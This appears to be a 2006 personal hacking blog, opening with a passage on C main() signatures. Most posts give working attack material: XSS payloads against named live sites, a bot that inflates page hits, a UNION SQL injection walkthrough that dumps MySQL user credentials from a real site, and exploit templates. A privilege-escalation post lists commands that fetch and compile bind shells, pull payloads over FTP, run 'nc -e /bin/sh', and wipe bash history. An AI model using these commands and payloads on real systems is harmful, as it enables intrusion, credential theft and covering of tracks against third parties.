The second option is used when you do not require access to the command line arguments, and is equivalent to the int main(void) option used by C99.

Again, the return type must always be an int, and the function should return 0; at the end, but it is not required by the standard.

(C) The difference between int main() and int main(void)

A common misconception for C programmers, is to assume that a function prototyped as follows takes no arguments:

int foo();

In fact, this function is deemed to take an unknown number of arguments. Using the keyword void within the brackets is the correct way to tell the compiler that the function takes NO arguments.

What's the deal with void main()

Under regular function calling/returning in C and C++, if your don't ever want to return anything from a function, you define it's return type as void. For example, a function that takes no arguments, and returns nothing can be prototyped as:

void foo(void);

A common misconception is that the same logic can be applied to main(). Well, it can't, main() is special, you should always follow the standard and define the return type as int. There are some exceptions where void main() is allowed, but these are on specialised systems only. If you're not sure if you're using one of these specialised systems or not, then the answer is simply no, you're not. If you were, you'd know it.

Be warned that if you post your "void main" code on the forums, you're going to get told to correct it. Responding with "my teacher said it's OK" is no defence; teachers have a bad habit of being wrong. Be safe, and post only standard code, and you'll find people concentrate on answering your other problems, rather than waste time telling you about this type of thing.

But what about int main(int argc, char *argv[], char *envp[])

As an extension to the guaranteed standard, an additional parameter to main() can, on some systems, be used to gain access to the environment variables. This is isn't guaranteed to work on all compilers, so use it with care if you want to keep your code portable.

And finally, this page gives some more background information as to why void main is bad.

Saturday, November 04, 2006

learning plan

While I started to learn more about buffer overflow, shell coding and the knowledge behind, I get really excited and depressed.Because I am learning something new(least to me, I only know how to compile and use it before) and feel depressed since I basically know nothing about it, esp asm. On the other hand, my focus also shifted to forensics and thereforely pay attention to honeypot, I played around the forensics image from polytech.edu, it is fun and easy, but felt unprofessional compare to challenge on honeynet.org.I decided to learn more these fields (forensics, honeypot, reverse engineering,intruction detection..etc) since honeynet provides detail answer from other known professionals, which is superb! um...Now I have sooo much to learn, cool!

Wednesday, November 01, 2006

Another xss

My brother showed me this site, an interesting site allows customized logo and I love this idea,
http://www.goglogo.com/s.asp?lo=inSiStKool
Very google-like and cool,rite!

but then I tried couple xss on lo param with no luck, I guess it has been filtered with regular expression, seems secured, hum! But hey, what the heck it works on the search box with simple alert call.
http://www.goglogo.com/s.asp?lo=inSiStKool&q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E
http://www.goglogo.com/show.asp?q=a&u=%3Cscript%3Ealert(31337)%3C/script%3E
I don't see the point they filteres 1st param and leaves others unprotected, to accpet the whole pharse for a more accurate search result or they just happened to forget to do so? Recall "if you spend more time on coffee, you will be hacked, and you deserved"

Tuesday, October 31, 2006

Enable Windows Serive II

Little extension of my last post

1)regedit /s
/s execute .reg,
Export that reg on your localmachine and upload to target host
or
echo .reg content in case you can't upload any to target(In fact,this is one of the reasons you need to modify the registry to enable service like telnet, remote desktop etc)

2)regini
This is another great command (esp its detail man page - Win2003 only)
e.g: regini.exe -m \\Server_name -b yourhack.txt

Thx h3llfyr3 for reminding me!

3)reg.exe
A command line version of registry editor, native process of WinXP and Win2003(Win2k Resource Kit),a very powerful tool.
Details can be found atpetri.co.il

Brief examples:
reg query {\\server_name\}HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr

Drawback:
1) WinXP and 2003 only
2) Require to be fairly familiar with registry structure and need to remember its options.
3) Lack of modify key value option (Maybe I don't know)

Other:
VBscript/Jscript Default MS scripting engine
Perl if and only if target system has perl (and Win32 package)installed

Sunday, October 29, 2006

BlogSpot Profile Hiter

Somehow came across my blog via google, found that only couple hits on my profile pages...hum, this doesn't look good, so I spent 5mins to write up this ugly script to auto hit.(Ooops, I must be bored!)

#!/usr/bin/perl

use LWP;
use strict;

my($usr_agent,$url,$i,$response,$num_hit);

$num_hit = < STDIN>;
$num_hit =~ /\d+/;

$usr_agent = new LWP::UserAgent;
$url="http://beta.blogger.com/profile/14114952655686676020";
$usr_agent->agent("oops");

$i=0;

while($i<$num_hit){

$usr_agent->timeout(25);
$response = $usr_agent->get($url);
++$i;
if($response->is_success){
print "Hit: $i\n";
}
}

Ha, now it has 252 hits....google doesn't need unique ip, or I have to grab bunch proxy which need more work.

Tuesday, October 24, 2006

IE context menu

Ok,create a IE context menu is not new any all.

Credits to old new things (http://blogs.msdn.com/oldnewthing/archive/2004/05/24/140283.aspx)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Context_Name
@="c:\\path\file.htm"

Then we can do funky things in html page,you can use common scripting language like javascript, vbscript to manipulate functions.

< script language="Javascript">
var fac = prompt("Factor",100);
external.menuArguments.document.body.style.zoom=fac+"%";
< /script>

As you see external is the object,with menuArguments method to do zooming.An alternative method is make a external object, port it as dll file or use your binary to output a html....Your design!

End? No yet, from a user's point of view, there might be some anonying malware injected into his/her IE, think about how to contrust a context menu?There you go, go to registry and delete the keys, also keep an eye on what lib it relies on(usually locates at HKCR\{id}), delete its lib as well. In fact, this is how some popluar anti-malware works (e.g:spybot), if you are designing similar software, it is worthwhile to dig into registry, the core of windows.

p.s: An interesting method by willij3 presents a shorter and neat hack
http://www.rpi.edu/~willij3/hacks/IEContextMenu_Reg.txt

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Dictionary.com]
@="javascript: open('http://www.dictionary.com/cgi-bin/dict.pl?term=' + external.menuArguments.document.selection.createRange().text,\"dictionary\");"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Google]
@="javascript: open('http://www.google.com/search?q=' + external.menuArguments.document.selection.createRange().text,\"google\");"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Open In New Window]
@="javascript: open(external.menuArguments.document.selection.createRange().text);"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Search Slashdot]
@="javascript: open('http://slashdot.org/search.pl?query=' + external.menuArguments.document.selection.createRange().text,\"/.\");"
"Contexts"=dword:00000010

Sunday, October 22, 2006

Password generator II

My last post about password generator , Warpboy's wordlistGenerator present an more effective way for looping.

alphanumeric
my $var = (('A'..'Z'),(1-9));

mixalpha
my $var = (('A'..'Z'),('a'..'z'));

upperAlpha
my $var = ('A'..'Z');

lower Alpha
my $var= ('a'..'z');

lalpha-smybol
my @var = (('a'..'z') ,(0..9),'!','@','#','$','%','^','&','*','(',')','-','_','+','=');

digit
my $var=(1..9);

all
my @char = (('A'..'Z'), (0..9),'!','@','#','$','%','^','&','*','(',')','-','_','+','=','~','`','[',']','{','}','|', "/", ":" ,";",'"',"'",'<','>',",",".","?","/");

My code:
for($i=65;$i<=122;$i++){ print ","; print "\"".chr($i)."\""; } Then the rest of his idea is fairly simple and nice $charset = chomp(); #get user desired charset...if($charset eq 'charset_name')

$inputted = chomp(); #number of words to generate
$len = Length(); #word length
$ran = $#var +1; #counter

foreach(1..$inputed){
for(1..int($a)){
$p=$char[int(rand($ran))];
print pa $p; #pa - file handler
}
}

His code is avaiabel http://www.securitydb.org/Warpboy/WordlistGenerator.rar
Cool...perl is really a great programming language with strong flexiblity and rich modules, I love it ~~



Enable Windows Serive

I was pentesting a Win2003 on my VM, and telnet had been disabled. So I thought I have to write a vbscript to enable, but it seems too much work compare to this:

echo Windows Registry Editor Version 5.00 >open-tel.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] >>open-tel.reg
echo "Start"=dword:00000004 >>open-tel.reg

Then execute regedit /s open-tel.reg
Remember to get rid of your trail del open-tel.reg
So this can extend to any other registry hack, locate the key you need to hack on local machine,then echo to reg file.
Done!

Lesson is that I should be more creative and seek different way to achieve the same goal.Hum....

Saturday, October 21, 2006

How to add your site or your favorite side to firefox sidebar search engine

You're a firefox fan? You're a webmaster or web developer? Ever want to add a customized search engine to firefox (top-right) side-bar? Great! Then this tip(not a new technique at all) is for you. Here is the instruction of how:

First you need to create a 16x16 pixels png image (as search engine icon)
Second, make a file.src as the following structure
version="" #version number
name="" #engine name e.g:Google
description=""
method="" #Get/Post
action="" #search url, where the html form goes
searchform=""
queryEncoding='' #This field is optional, e.g:ISO-8859-1
queryCharset='' #This field is optional, e.g:ISO-8859-1
>

#parameter(s)
< input name="" user>
< /search>

update="" #url to get the lastest src file
updateIcon="" #url to get the lastest src file
updateCheckDays="" #datatype: int
>

Easy,hum! Of course, before you perform the above steps, make sure you website or your favorite site has a search engine. Finally, put this script into a page(locally or remotely)

function addEngine(name,ext,cat)
{
if ((typeof window.sidebar == "object") && (typeof window.sidebar.addSearchEngine == "function"))
{
var url=""; #your url
window.sidebar.addSearchEngine(
url+name+".src",
url+name+"."+ext,
name,cat );
}
else
{
document.write("oops,error");

}
}

javascript:addEngine('title','image_format','search_category')
More info at http://mycroft.mozdev.org/deepdocs/installing.html#manual

In case you get tired of it, simply remove the src and png.
Profile Folder can be found at here

Thursday, October 19, 2006

password generator

Wrote dictionary generator script for brute force my route passwd...I know I can use C4S3y's module to make the whole work easier and make some cool script, but I just want to get my hands dirty and review a little bit perl script...
#!/usr/bin/perl

# Author: insistkool
# Date: Oct-19-2006
# Purpose: password generator - Upper and Lower Case
use strict;
use Getopt::Std;

#The for loop here is to create a alpha lists

#for(1..9){
# print ",";
# print "\"".$_."\"";
#
#}
#
#for($i=65;$i<=90;$i++){
# print ",";
# print "\"".chr($i)."\"";
#
#}
#
#for($a=97;$a<=122;$a++){
# print ",";
# print "\"".chr($a)."\"";
#
#}



my @chars =("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P",
"Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i",
"j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2",
"3","4","5","6","7","8","9");

my ($x,$y,$z,$a,$b,$c,$dict,%opts);

getopts('h:o:', \%opts);

if(defined($opts{'o'})) {
$dict = $opts{'o'};
}
else {
$dict = "dict.txt";
}

if(defined($opts{'h'})) {
usage();
}

sub usage{
print "Usage: $0 -o dict.txt\n";
print " \t -h man page\n";
print "If output file is not specified, it will be saved to dict.txt\n";
exit 31337;
}

open(dict,">$dict");


for($x=0;$x<@chars;$x++){
for($y=0;$y<@chars;$y++){
for($z=0;$z<@chars;$z++){
for($a=0;$a<@chars;$a++){
print dict "$chars[$x]$chars[$y]$chars[$z]$chars[$a]\n";
}
}
}
}
print "Check $dict!\n";
close(dict);

Wednesday, October 18, 2006

Windows Command Line

Do you know Windows Management Instrumentation Command-line (WMIC) tool?

Nope, then you should peer at wmic man page by
wmic/?

Sample command usage
wmic bios > os-bios.xls
wmic process > os-process.xls
wmic os > os.xls

This comes faily handy, but three drawbacks I have found so far are
1) You have to admin (Isn't MS advocating least-privilege law)
2) It only supports Windows XP Pro and 2003
3) Lack of output indentation

Anyway, it is a pretty cool utility, all windows power user should spend little bit time on learning it.

More WMIC info can be found here

Tuesday, October 17, 2006

Stupid yahoo messenger

My yahoo messenger has been sucked for a while, so does stupid windows media player...simple reinstall doesn't aid at all, forced me to take time to figure out this whole shit was caused by both of them heavily rely on vbscript.dll and jscript.dll,
with regsvr32 jscript.dll & regsvr32 vbscript.dll finally get them work. I can't believe yahoo uses windows internal library rather than develop an independent lib...lazy yahoo dudes!

Back Track 2.0 Beta released!

Wow...back track new version, hella new stuff been added in, cant wait to give it a try

BackTrack Home
* Updated Kernel-Running 2.6.18-rc5, with several patches.
* Updated Tools-Old versions updated, new tools added.
* BackTrack Network Boot-Boot additional BackTrack images over PXE
* John MPI instant Cluster-Boot BackTrack cracking cluster clients over PXE
* Save2CD-Save changes to CD (assuming CD is multi-session, and a CDR).
* Japanese Input Support-Reading and writing in Hiragana / Katakana / Kanji.
* Unionfs replaced-by aufs with zlib compression.
* Kernel Sources-Included in base image.

Special Features:

* Instant Snort Setup-Sets up snort, mysql, apache, base.
* Instant Ninja (db_autopwn) - Deploys Metasploit db_autopwn on the local subnet.
* Instant Unicornscan pgsqldb Setup-Sets up Apache, Pgsql for scan info.
* Kismet auto configuration-Sets up monitor mode and kismet.conf.
* ipw3945/2200/2100 support-no injection patches.
* Prism54 / MadWifi-ng / Wlan-ng / HostAP / rt2570-With injection patches.
* Quick Installation-Using GUI installer, 100% MySlax compatible.

escalation

interesting hack by h3llfyr3
http://www.h4cki.org/index.php?title=From_a_4Images_SQL_Injection_to_Root_Access_-_Privilage_Escalation

also some cool hack from they peers!
find . -perm -2 -ls

The dot being what directory to search, so I would suggest doing:

cd /home/user/public_html/;find . -perm -2 -ls

It will then give you a list of folders and files that are writeable .. Dont forget that there are other downloaders than wget .. Doing the following command will show you what downloaders are running on the box:

which wget curl w3m lynx

For wget:

wget --directory-prefix=[DIR HERE, NO EXTENSION] [URL HERE]

For curl:

curl -o /home/user/public_html/shell.php http://www.shell.txt


cat >bindshell.c
curl -o /home/user/public_html/bindshell.c http://www.server.com/bindshell.c
gcc bindshell.c -o bindshell
./bindshell

echo open 10.0.0.1 > file.txt
echo lcd /writeable/web/dir/ >> file.txt <--this swaps your local directory to one you can write to
echo user anonymous >> file.txt
echo pass anonymous@anon.com >> file.txt
echo get bindshell.c >>file.txt
echo bye >>file.txt
to execute
ftp < file.txt


Other common tech for RSH
tftp -i attacker_ip file (nc)

nc -e /bin/sh -l -p port_number (-DGAPING_SECURITY_HOLE MUST BE compiled)

if victim host has X terminal such as xterm
xterm -display attack_ip:0.0 &

check last 20 entries in history
tail -20 /root/.bash_history

And to remove current .bash_history
rm -rf /root/.bash_history

disable command logging
ln -s /dev/null /root/.bash_history

Monday, October 16, 2006

*nix commands

Common daily use commands (to me ^^)
#show all system info
uname -a

#check distributions
cat /etc/*issue
cat /etc/*release*

#check who is online and ip
w

#Check username and working directory
cat /etc/passwd

#Get ip
ifconfig {eth0 etc}

#You know what this is
cat /etc/shadow

#find a file
locate file.ext

#find machine on the subnet
arp -a

#compile c code
gcc in_file -o out_file

#change file permission, x -[1-9]
chmod xxx filename

#show running process
ps aux

#calculate MD5 sum for every file on the system (assume md5sum is on the system)
find / -type f -xdev -exec md5sum -b {} \;

#find readble files
find / -type f -perm -4 -print 2> /dev/null

#find writable files
find / -type f -perm -2 -print 2> /dev/null

#find system time and date stamps
find / -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"

#display system variables
set

#echo current path
echo $PATH

#clean screen (windows cls)
clear

#dump kernel modules
lsmod

#check mouted file sys
mount/df

#Check patch level for RedHat 7.0
rpm -qa

#list Open Files
lsof (lsof `which file`)

#hardware info
dmesg

#usual place for logging
cat /etc/syslog.conf

#how can we miss this, this can be couple pages of essay,brief example
grep str *
grep -r -i "\-a"

#check current user info
id

#figure out how long the host is up
uptime

#some system hardware info
cat /proc/meminfo
cat /proc/cpuinfo

Tuesday, October 10, 2006

HTTP Verb

From Professional Pen Testing For Web Application
HTTP 1.0 specification defined three main verbs, or methods:
GET is used for requesting, or retrieving, some resource from the target web server
POST is used to request that the target web server accept the data enclosed in the request.The acceptance is based in the fact that the processing gets handed off to the resource listed in the request (the URI)
HEAD is used exactly like GET except that the resource data body is not transferred;only metadata is sent back to the client.

HTTP 1.1 specification added the following new HTTP verbs:
PUT is used for requesting that the target web server process the requet in to the resource listed (the URI).
DELETE is used to delete (on the webserver) the resource from the respecive request.
OPTIONS is used to request information about the communications options available in respect to the particular target web server.
TRACE is used to request a remote loopback of the request to the target web server.
CONNECT is used strictly with Proxy servers that can tunnel directly with the taret web server.

I didn't know put,delete trance and other verbs were added in 1.1 specification, Cool!

Monday, October 09, 2006

Another xss

A XSS on lycos, the point to point out is not because this is a big site, but it display my " when http://www.homme.lycos.fr/hotbabes/categorie/"
I am wondering whether this is fuzzable, seems kinda hard coz " is a valid html code...
Anyway, interesting to know xss could also happened on a regular url (not parameter)

lycos.fr

Updated: This xss already expired, but it still serves as a pretty good lesson for developers

Sunday, October 08, 2006

XSS bug

found an interesting type of xss of this site, contrust a html header and do the dirty work

mass.gov

Exposed the header, this is indeed fairly funky
http://www.test.com Content-Length: 0 Cache-Control: max-age=300 Expires: Mon, 09 Oct 2006 06:15:35 GMT Connection: close Content-Type: text/plain; charset=ISO-8859-1

similar ones...

lvllord.de


Another one on
mwti.net


And discovered a xss on a metasearch engine while i was at class
click here to see demo

even one on a government website,
http://www.xxxxx.xxx.gov.au/email/?url=%3Cscript%3E
alert(%22XSS%22)%3C/script%3E

Saturday, October 07, 2006

Server Probing

Here is Server Probing script from somewhere, pretty nice...
Of course, Server Spy can do this , but the idea basically functions the same
perl $0 > server

#!/usr/bin/perl -W
use strict;
use IO::Socket;

my @hosts=qw(www.google.com www.foundstone);

sub go{
my $server=shift;
print "Processing Server probing ...\n";
my $socket=new IO::Socket::INET(PeerAddr=$server,
PeerPort='80';
Proto='tcp');
$socket or die "\n unable to connect to the $_:$!";
print $socket "GET / HTTP/1.1\r\n\r\n";
while($socket){
if(/^Server:\s*(.*)/){
print "$server:$1\n";
last;
}
}
}

foreach(@hosts){
go $_;
}

Thursday, October 05, 2006

Google Code Search

Google's new code searhc engine rocks! This is gonna be super awesome to dudes like me....
http://www.google.com/codesearch
It not only supports basic search operators, and have added some nifty advanced searching keywords, such as regexp, file:regexp, lang, package:regexp, license...

We can find common web vulnerability very easily (xss, sql injection, remote command execution, remote file inclusion...you name the rest) It must be cool that some one developed a set of signatures like gdhb to match common web application vulnerabilities......Can I do it!

Wednesday, October 04, 2006

Shift and $_

Took me a whiole to figure out what the hell 'shift' and $_ do

my $suck =shift;
print $suck;

[root@rooted_Box]$ perl suck.pl 2
2

my $suck =shift || '192.168.1.1'; //Show 192.168.1.1 if no arg
print $suck;

[root@rooted_Box]$ perl suck.pl
192.168.1.1

my @arr =("a","b","c");
for(@arr){print $_."\n"};

output:
a
b
c

um....perl syntax!!

perl & php exploit template.....

Pretty neat perl exploit template ripped from ezine...

#!/usr/bin/perl

use strict;
use other_modu;

my($host, $port,$shell) = @_;

sub usage{
print "bunch usage";
exit();
}

sub exploit{
}

sub thread{
for my $i(1..MAX_THREAD){
print ".";
my $thread= new Thread \&exploit, $host, $port, $shell
}
}
if(@ARGV < num_argv) {&usage;}else {&exploit;}

and another php exploit template from rgod(i guess)

#!/usr/bin/php -q -d short_open_tag=on; error_reporting(0); //turn off error_reporting, E_ALL when doing debugging ini_set("max_execution_time",0); //execute the script rite away ini_set("default_socket",5); function quick_dump($string){ $result=' ';$eax=' ';$cont= 0; for($i=0;$i<=32 | ord($string[$i] >=126){
{$result.=" .";}
}
else{ $result.=" ".$string[i];}
if(strlen(dechex(ord($string[$i]))==2){
$eax.=" ".dechex(ord($string[$i]));
}
else{
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$url = " ";
$packet="POST ".$url HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

Thursday, September 28, 2006

New Quarter schedule

New quarter began yesterday, busy life started again. I chose some dummy courses like microeconomic, english, just to fulfill the general requirement for graduation. It sucks! Hate the rules of this kind of stupid game, you always need a degree or cert like to get your resume sharp, or no one is gonna care you or simply ignore your existence no matter how superb you are. I guess this is the reality so I should not complain any more. All rite, so I scheduled to sharpen my programming skills in php, perl, C++ (just start to learn).... Inspired by the idea of rgod, I felt the strength of php CLR, its rich module supports as well as perl and python are huge enough to get most web application based exploit work perfectly. Besides these, it is mature to pay attention to open source application, find bug and code exploit and patch are considered to be the quick and dirty way to win in the community, (and you certainly have to do things like H D, found awesome project like metasploit...) I see the distances between me and guru, it drive me keep catching and never stop! all rite, pretty much about it.

p.s: thanks brother for reminding to keep up blogging.

Wednesday, August 16, 2006

Excite with honeypot project

Get really excited when seeing the honeypot project, I was planning to read TCP/IP protocol vol 1 by the beginning of the quarter, but turned out spent so much time on scripting (perl, python, php, pentesting, database...4P -.-) Well, it is the best time to grab a bsd or dig more slackware due to my desktop xp crashed. It must be so much fun to setup Honeypot and host a site over desktop, to
see how people do stuff over my machine and let them hack. And I really need to study C, C++ and ASM, esp how to debug application, reverse engine them....Oops, and I need to get my web fingerprinting paper done asap.


http://www.honeynet.org/scans/scan34/

MySQL system-functions summary

Dirty Summary for mysql system functions, mainly for dba or pen tester:

  • found_rows() - returns the current table row numbers
  • last_insert_id() - for auto_increment para, this is somehow helpful
  • user() - this is extremely useful,it returns the current username (e.g:root ->then you can smile ^^)
  • database() - this is cool too, gives back the current database name, ease the pain of spending hours on finding it.
  • version() - This is awesome, you all know mysql 3,4,5 are different and have some unique features.Without knowing the version, you might stuck for another hours
  • connection_id() - Well, you can guess how busy this database is
  • INET_ATON(ip) - Not really useful for pentesting
And some password functions,
  • password($pwd) - encrypts a specified string as a 41-byte hash value, it is pretty weak alogrithm
  • md5($pwd) - MD5 encryption, possibly crackable
  • sha($pwd) - sha encryption, possibly crackable (sha1-version, which means you can use sha1($pwd) for getting the same result
Might not completed...correct me!

Mysql injectin try

Another quick note for a mysql injection I experiemented today, this is a classic mysql injection:

With a url http://www.site.com/script.php?ID=2885
change parameter id to -1 returns normal response,
make it to a,got Unknown column 'a' in 'where clause',
with 1.1, works fine...
so this means this parameter is numeric type, decimal, float, double, int, bigint, or smallint....
( remember that decimal has three types: NUMERIC ,DEC,FIXED......um....cant remember other details)
then craft a union clause, http://www.site.com/script.php?ID=2885%20union/**/select/**/0/*
returns mismatched number columns, keep adding till return noraml page....(should code it up to automate the whole process....someone must have done one, google !!)




http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29, 28,27,26
25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*
now

ttp://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29,
28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

I got 342E312E3138
mysql> select 0x342E312E3138
-> ;
+------------
----+
0x342E312E3138
+----------------+
4.1.18
+----------------+

um...it is mysql 4.1.18...

Same idea,

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,hex(user()),31,30,29,28,27,26,25,
24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

mysql> select 0x726F6F74406C6F63616C686F7374
-> ;
+--------------------------------+
0x726F6F74406C6F63616C686F7374
+--------------------------------+
root@localhost
+--------------------------------+
runing with root privileges...

next,submit
http://www.site.com/script.php?ID=28851=2%20union%20select%2051,343,3,34,75736572,hex(version()),31,30,29,28,27,26,25,24,23,22,
21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/**/from/**/user/*

to test the existence of user table, it doesn't. However, it exposed the table name, then it is bruteforceble (construct a txt with list of possible table names, grab status code,sort out the result...) I later found out calling database() yields the same result.


I am curious what the system is (presumbly linux, just want to confirm it), so a quick banner grabing indicates this is a Unix host, and with port scanning found out telnet is open, another banner grab shows it is FreeBSD/i386....all these clues shows i can simly skip trying Windows path for dumping...

ok....time to do homework, resume after test, next I should try to hex, ord or chr someone column fields to bypass the int scheme, and figure out which field is user and pass, check exploit for this specific version mysql (I wont do this for sure, script kiddie shit)or probably dump out a guest readable file(need to know its physical path to do so, how? phpinfo() might be a way to go,but it cant convert to digit....-.-)

Well, all these seems bit script kiddie stuff, but I learnt the idea behind and how to secude code php, but I am still not feeling confortable with mysql injection...while php,mysql are playing pretty important role in the market, I just have to confront and master it.

Ok...
Resume to yesterday's work.
Someone found out a sql bug on




WebTorrent (WTcom) Script <= 0.2.4
http://[SITE]/torrents.php?mode=category&cat=0%20union
%20select%20null,null,concat(username,char(32),password,char(32),
email)%20from%20users%20/*



This inspired me to submit

http://www.site.com/script.php?ID=2885=2%20union%20select%2051,2,3,34,hex(concat(user,char(32),password,char(32))), 2,31,30,29,28,27,
26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1%20from%20mysql.user/*

Cool ! it dump out the user and password in hex....Now task done, it can be connected remotely, next step is to hook up and see the inside which I am not intented to do. All these tries are solely to practise my skill....All the techniques are fully described in most whitepapers which can be found somewhere online!

Lesson Learnt:




  • all built-in functions (hex, char, oct, ascii, system,database,user) can get task done more easily.
  • /**/ comment delimeter
  • Put ' single quote
  • Place and 1=1, and 1=0 (blind sql injection)
  • Change the chartset with hex,char,ascii, oct for converting data type
  • Use system functions for probing the database info
  • Check if connection can be connected remotely
  • Use automated tool (e.g:sqlbf...bruteforce will be shown on the log and be detected by admin.)
  • Many more....

Funny browser

Quick note solely for reminding myself....
www.google.com
dec:1113982819
hexdec:42660763
Hex:7777772E676F6F676C652E636F6D
md5:0a137b375cc3881a70e186ce2172c8d1
binary:
0111011101110111011101110010111001100111011011110110
111101100111011011000110010100101110011000110110111101101101
base64:d3d3Lmdvb2dsZS5jb20=

FireFox and IE have different response to each, and both accept dec...When binary input to firefox, it will auotmatically place: keyword:_binary_here_, I guess this might have something to do with it built in google as default search engine and load it up when it can resolve the string, or I all loaded up some third party library.
Anyway,it is funny and somehow exposed the mechanism of browsers....Different browser response differently, and crafted input or code can smash it is the lesson I learnt from. I should dig more later....

URL:http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
White paper about url encoding... To be read

Tuesday, August 15, 2006

Web server fingerprinting

I have decided to write a paper over web server fingerprinting, primarily aims to some popular web servers. I know this topic has been done server times and tons tools avaiable to make the whole process failr easy,however, I observered some new techniques been released recently,which starts to influent the current situations. Due to the web is getting important, how to defense and attack the web service and server are extrememly hot and in fact the hotest and critical topic for every IT pro, security professional and programmers.If you have any thought or constructive ideas over this topic, shoot me an email or drop a note here, i will get you back.

Monday, August 14, 2006

First post...little testing....
I will post my personal thoughts here..